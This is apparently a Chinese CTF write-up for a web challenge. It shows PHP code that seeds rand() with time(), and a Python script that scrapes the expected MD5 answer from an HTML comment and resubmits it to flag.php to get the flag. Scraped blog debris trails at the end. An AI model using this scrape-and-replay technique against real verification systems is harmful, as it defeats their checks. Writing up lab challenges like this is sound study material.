打开页面就是一个输入框,非sql注入
查看页面源代码,发现有一个hint.php,访问后看到源码,但是有随机种子,根据时间不同随机值是变化的。time()输出时间戳,如果在短时间内访问,就会固定这个种子。
<?php
$key = "********";
srand(time());
$a = rand(0,100);
$b = rand(0,100);
$c = rand(0,100);
$d = rand(0,100);
$e = rand(0,100);
$result = ((($a - $b)/$c)+$d) * $e;
$result = md5($key.$result.$key);
show_source(__FILE__);
?>回到首页随意输入Md5值,查看源码: b872fba1e81f2fa869ebc536ffbc3a52
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>答案就在这儿</title>
</head>
答案错误</br>emmm我觉得答案是啥呢?<!--94390a7169798b0731d142baddbe6681-->可以写程序快速提交md5,根据返回的Md5值快速提交
import requests
import re
url='http://ip/flag.php'
data = {'answer':'32c4e35f76a92617d3849dca494bc9a5'}
resp = requests.post(url=url,data=data)
#print(resp.text)
ll = re.findall(r'<!--[a-z0-9]+-->',resp.text)
l0=re.findall(r'[a-z0-9]+',ll[0])
data = {'answer':l0[0]}
resp = requests.post(url=url,data=data)
print(resp.text)返回结果:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>答案就在这儿</title>
</head>
flag{ef58f0b1e9437b4451248fb3f239622b}![[<span style='color:red;'>web</span>]-<span style='color:red;'>代码</span><span style='color:red;'>审计</span>-运维失误](https://i-blog.csdnimg.cn/direct/a948830b36774227aace924aa20da72c.png)
106:提取不重复的整数107:哈夫曼编码108:abb](https://i-blog.csdnimg.cn/direct/9397e6efca8d4b2c9977df823896e65e.png)
